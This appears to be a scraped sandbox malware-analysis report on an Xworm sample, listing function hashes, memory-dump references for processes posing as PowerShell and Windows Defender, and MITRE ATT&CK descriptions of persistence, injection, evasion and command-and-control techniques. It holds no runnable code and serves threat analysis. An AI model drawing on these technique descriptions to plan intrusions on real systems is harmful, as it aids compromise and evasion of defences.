Instruction ID: 3267944376d04d4625a9cb60c023de7d1bc4502b299e17d36fc30737d56e291f
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: AE01677111CB0C8FDB44EF0CE451AB5B7E0FB95364F10056EE58AC3655DA36E892CB45

Function 00007FFB4AD1A0FB Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2102497376.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4ad10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bf206fa1549323fbfeabaf8987fe40744ae10b7381bf9021bb5dced9d7d6127
Instruction ID: bc3b918718edafdc80e8104936614481e8d574754551b1280201bea317aaeed0
Opcode Fuzzy Hash: 2bf206fa1549323fbfeabaf8987fe40744ae10b7381bf9021bb5dced9d7d6127
Instruction Fuzzy Hash: C4F0F6B660CA8C4FC745EF3CD8696E5BFE0EF66205B4501EBD948CB1A2D7214948C7C1

Non-executed Functions

Function 00007FFB4AD18BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

N_^Q, xrefs: 00007FFB4AD18C8A
N_^8, xrefs: 00007FFB4AD18BF2
N_^K, xrefs: 00007FFB4AD18C6A
N_^Y, xrefs: 00007FFB4AD18CBA
N_^J, xrefs: 00007FFB4AD18C62
N_^N, xrefs: 00007FFB4AD18C72
N_^?, xrefs: 00007FFB4AD18C2A
N_^<, xrefs: 00007FFB4AD18C12

Memory Dump Source

Source File: 0000000A.00000002.2102497376.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4ad10000_powershell.jbxd

Similarity

API ID:
String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
API String ID: 0-2388461625
Opcode ID: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
Instruction ID: d2cac90ae1de6ecf806dc8e9646882d08623fd955616855fc6814e405c66f113
Opcode Fuzzy Hash: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
Instruction Fuzzy Hash: 642129B3A096119AC3023BBCFC515D87B85DF5437834541F3EA18DF113DD14689B87A2

Analysis Process: Windows Defender.exePID: 6324, Parent PID: 4084COMMON

Executed Functions

Function 00007FFB4AD312C9 Relevance: .6, Instructions: 650COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2282433205.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffb4ad30000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53a1eba699164b950a516d6ee21e3e1fa01397eaee6c52f504543f26b32d4174
Instruction ID: d02f5763aa208f62d556f118f0201e6898035cf1af99f5ff374854014be9fa40
Opcode Fuzzy Hash: 53a1eba699164b950a516d6ee21e3e1fa01397eaee6c52f504543f26b32d4174
Instruction Fuzzy Hash: AB12B3A0B2DA4A4BE798FF38C4592B977D6FF98304F5445F9E44EC3686DE28AC018741

Function 00007FFB4AD31B39 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2282433205.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffb4ad30000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 570951a37fb504f6791d5330d8454951d3811fcca522b0dfecb8002843e720c4
Instruction ID: 04c5fcc40ffaf63ca376bce78ae8c1ce5f749b91719eaa205619236875f040ef
Opcode Fuzzy Hash: 570951a37fb504f6791d5330d8454951d3811fcca522b0dfecb8002843e720c4
Instruction Fuzzy Hash: CB51F0A1B1E6CA4FDB86BB7888686B57FD5DF8B215B1800FAE08DC7193DD184846C342

Function 00007FFB4AD30E05 Relevance: .5, Instructions: 541COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2282433205.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffb4ad30000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bfd16423255a0606ad3ed753aca3985e0fbef56359f6a08374a65dc39ccf054
Instruction ID: bd2e528d7e7414c868b232b2aa2af9f8faef090651e5b0a135173dfdf80e58e9
Opcode Fuzzy Hash: 3bfd16423255a0606ad3ed753aca3985e0fbef56359f6a08374a65dc39ccf054
Instruction Fuzzy Hash: 8C3127A6F0D68B4FEB85BF78D8A11F97BB4FF44210F5441F6D089D6093DD2858028390

Function 00007FFB4AD30C3E Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2282433205.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffb4ad30000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5e30fcdc63d2ca23036219de21d2beecb31c8aa2f35c8cf08402e7e516f1ab
Instruction ID: f7e005d2403365531987d0211997bc9efa8a7e270327d349b2b3f3b2803943bc
Opcode Fuzzy Hash: bf5e30fcdc63d2ca23036219de21d2beecb31c8aa2f35c8cf08402e7e516f1ab
Instruction Fuzzy Hash: 8C510361A0E68A0FE757BB38D8551B57BE1EF8621070900FBD888C7193CD1C9C468352

Function 00007FFB4AD30538 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2282433205.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffb4ad30000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14efbb4b1a4ec7a1bd1617758ee3f041bf8c06af68acde3d5d20db7ee7fc0dff
Instruction ID: c44f9932110beb0b5d310346d6681acb07a940081ef54b9e6e666c6eeedf2789
Opcode Fuzzy Hash: 14efbb4b1a4ec7a1bd1617758ee3f041bf8c06af68acde3d5d20db7ee7fc0dff
Instruction Fuzzy Hash: E431C061B19A4A0FEB98BF3CD45A279B6C6EB9D315F1401BEE44EC3293DD689C428341

Function 00007FFB4AD30AD1 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2282433205.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffb4ad30000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a44098f9932730913d069282eb9d18ceacaddfba6fe5f4fe67e7bec11c72be60
Instruction ID: c24b2e47cf0e57106b50e2bcb1ccee8cedd327f6cf19d5089de3c1ef1abdd64e
Opcode Fuzzy Hash: a44098f9932730913d069282eb9d18ceacaddfba6fe5f4fe67e7bec11c72be60
Instruction Fuzzy Hash: D931E0A1B19A098FF785BFBCD8192BD77D5EB98301F0402FAE40CC3286DD2898028391

Function 00007FFB4AD307F8 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2282433205.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffb4ad30000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6e031c8495a50eedc67256a31ee8b78fc316824b28174ff0a76298a9ba7d5a4
Instruction ID: 00a44ff911aee54d1fdae55c47b88f50b39c427d5a653e79081677a7ba9d3433
Opcode Fuzzy Hash: b6e031c8495a50eedc67256a31ee8b78fc316824b28174ff0a76298a9ba7d5a4
Instruction Fuzzy Hash: 9E41486060E61ADBD386FF78D0591E87B60EF84214B54C1F1E88D9668FCD286DA287A4

Function 00007FFB4AD30985 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2282433205.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffb4ad30000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6e46d768f5d11591554fd54056de4bc29b2ab2bfa87dcf11e622475fc5fb5f
Instruction ID: 12b6fbd25e2385a99b3b74e83f8ac928b8e4816f3842dbb6d6f44bd4849575de
Opcode Fuzzy Hash: 5b6e46d768f5d11591554fd54056de4bc29b2ab2bfa87dcf11e622475fc5fb5f
Instruction Fuzzy Hash: 57319270A19A0E8FEB45FFB8C4557ED77A2FF98300F6445B9D409D368ACE38A8528750

Function 00007FFB4AD31CF1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2282433205.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffb4ad30000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef3d49d28631b9b652edd5b0dcb16a42290019aa1d91625aca6be2b85698fb88
Instruction ID: f0f82364ba91ff330e68c3378914fc3dbc7ef4478f6f1872aeaac2c577ccfb12
Opcode Fuzzy Hash: ef3d49d28631b9b652edd5b0dcb16a42290019aa1d91625aca6be2b85698fb88
Instruction Fuzzy Hash: A7017B91A0D7D28FE782BF3899554717FE0CF96640B2800FEE8C8CA0D7DC0CAA448782

Analysis Process: Windows Defender.exePID: 7132, Parent PID: 4084COMMON

Executed Functions

Function 00007FFB4AD112C9 Relevance: .6, Instructions: 650COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2364589088.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4ad10000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9a13f14587f3681f739d31f3cb0949700ce5d27e20186b6b0d72dfa2dfa2b2d
Instruction ID: 193cc4d091ac4671c8f10206aedb5d3900fd8d79d256dab2f16bc7b0d1720e71
Opcode Fuzzy Hash: f9a13f14587f3681f739d31f3cb0949700ce5d27e20186b6b0d72dfa2dfa2b2d
Instruction Fuzzy Hash: B712B3B0B2DA5A4BE794FF38C5592B97AD6FF9C301F5405B9E44EC3287DE28A8018741

Function 00007FFB4AD11B39 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2364589088.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4ad10000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40d888319decf5bff3271118fb02cefc4c3c61da085c7628149eaa941f4dfdc0
Instruction ID: 2974c3bd4246869ab23786a531218a413980783c6514620edd7f5832eb7d643c
Opcode Fuzzy Hash: 40d888319decf5bff3271118fb02cefc4c3c61da085c7628149eaa941f4dfdc0
Instruction Fuzzy Hash: 5C5101A0B1E6C94FD786AB7898686B5BFD5DF8B215B1800FFE08DC7293DD185846C342

Function 00007FFB4AD107A0 Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

O, xrefs: 00007FFB4AD1087C

Memory Dump Source

Source File: 0000000F.00000002.2364589088.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4ad10000_Windows Defender.jbxd

Similarity

API ID:
String ID: O
API String ID: 0-878818188
Opcode ID: aa06dd5d255be515a5ad5088e9aa39a616147f0c57c387bb2a67987bfd8c929a
Instruction ID: 8c922158d23974bd674ad1d7af5fef8f445a22df0cfee009212f3a7e2040bd5b
Opcode Fuzzy Hash: aa06dd5d255be515a5ad5088e9aa39a616147f0c57c387bb2a67987bfd8c929a
Instruction Fuzzy Hash: 2D514C9250E756DFD352BF7CE4511EA3F50DF49225B4485F2D88C8A28BCC282D5683B0

Function 00007FFB4AD10848 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

O, xrefs: 00007FFB4AD1087C

Memory Dump Source

Source File: 0000000F.00000002.2364589088.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4ad10000_Windows Defender.jbxd

Similarity

API ID:
String ID: O
API String ID: 0-878818188
Opcode ID: 82e748e3441eedf6bd69fd33e85a0e30ac940412855a5527a946bd6e6d721211
Instruction ID: db94d30c3da10ca77bd7220c36aafdc99228f9008b9c685e61bf6d51c314c154
Opcode Fuzzy Hash: 82e748e3441eedf6bd69fd33e85a0e30ac940412855a5527a946bd6e6d721211
Instruction Fuzzy Hash: 0A3106A154DB49DFD352FF78D0552EA3FA1AF8D201B8084E5D848C738BCD386E0183A1

Function 00007FFB4AD10E05 Relevance: .5, Instructions: 527COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2364589088.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4ad10000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c87fa92b6f64d4a07bdc2f765d8ce2c5eba8d33bdf33058e7880ebd3fa61a48
Instruction ID: 461b71d33041bdaad3db41b23568d59a29590af0eb7c688f652fc5241f1b6abe
Opcode Fuzzy Hash: 4c87fa92b6f64d4a07bdc2f765d8ce2c5eba8d33bdf33058e7880ebd3fa61a48
Instruction Fuzzy Hash: 823104A6B0DA574FE781BFBCD8A61F97FA4FF88211B5540F6D088CA093DD281C428390

Function 00007FFB4AD10C3E Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2364589088.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4ad10000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0587408084ad1383f49a779a9c69eece31f653bba769ef6ecf950be358ff715
Instruction ID: 01566a3c66a7b06e1428bde10e8306b59d6653a781d2f76e89db4b38cbc9c39a
Opcode Fuzzy Hash: c0587408084ad1383f49a779a9c69eece31f653bba769ef6ecf950be358ff715
Instruction Fuzzy Hash: A5510361B4E6960FE757BB38D8552B53FE2DF8622070900FBD488C7193CD189C468362

Function 00007FFB4AD10538 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2364589088.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4ad10000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9633fdaeef372052097676e44c2fbedee6ca2a633d3657a758b4472a6cdc7c9b
Instruction ID: dc733e72e4afcf460278917be2c648bf1475119a8df3a51fb4c6ac276ff337ff
Opcode Fuzzy Hash: 9633fdaeef372052097676e44c2fbedee6ca2a633d3657a758b4472a6cdc7c9b
Instruction Fuzzy Hash: 1531CE61B19A490FE798FA3CD45A3B9BAC2EB9D315F0401BEF44EC3293DD689C428341

Function 00007FFB4AD10AEB Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2364589088.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4ad10000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0ba4e30a999104833dd70a787d9bcd4c670c03c93e2e7af0ba233479ea63e0b
Instruction ID: 48ded47591429864d3a805cff00f4e5a029f8d1dd97bf51c96744eeefb91fd81
Opcode Fuzzy Hash: d0ba4e30a999104833dd70a787d9bcd4c670c03c93e2e7af0ba233479ea63e0b
Instruction Fuzzy Hash: AB31C4A1B18A194BF745BFBCD4593BC7AD6EB98311F0001B6E40DD3286DD289C424391

Function 00007FFB4AD10985 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2364589088.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4ad10000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 443aecdfbb0044c7bd73224af216e7ce8862af3592b5f80a9058ba0466ccd122
Instruction ID: 27aef2f9278cbb7a53d96e41ec9fdd4694dd0dde6cbe0e42836279f7f1f80fb6
Opcode Fuzzy Hash: 443aecdfbb0044c7bd73224af216e7ce8862af3592b5f80a9058ba0466ccd122
Instruction Fuzzy Hash: 1631B1B1A19A1A8FEB45FFB8C4556FA7BA2FF98301F5445B5D009D3286CE38A8018750

Function 00007FFB4AD111BB Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2364589088.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4ad10000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a485db42bc77db36c479e8a94ca4abf684c673daf579ff7b2738e647587ab198
Instruction ID: a2fade45cfee5dcecbf98f07176af559511159e9b8ed709a25b74e3539ef6fd1
Opcode Fuzzy Hash: a485db42bc77db36c479e8a94ca4abf684c673daf579ff7b2738e647587ab198
Instruction Fuzzy Hash: BA1145B2A1C95B5BEB84FEA8C8A55FA7FA5FB58300F914078E049D3187CE286D019780

Function 00007FFB4AD11D09 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2364589088.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffb4ad10000_Windows Defender.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f9a393ea7ab5daf04f8f6a3982d309d8fb94ebf2028bb2ae726a0ec99afe2fc
Instruction ID: a621a80944669f8ebb9f4159715447a3ee89411f1bd37e2237fa199a12ff0ef7
Opcode Fuzzy Hash: 3f9a393ea7ab5daf04f8f6a3982d309d8fb94ebf2028bb2ae726a0ec99afe2fc
Instruction Fuzzy Hash: F4F027A2E0CB260BE744BE3C958A5797FD0D7A8641B4808BDF849D62D6DC689A8143C2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report owuP726k3d.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary
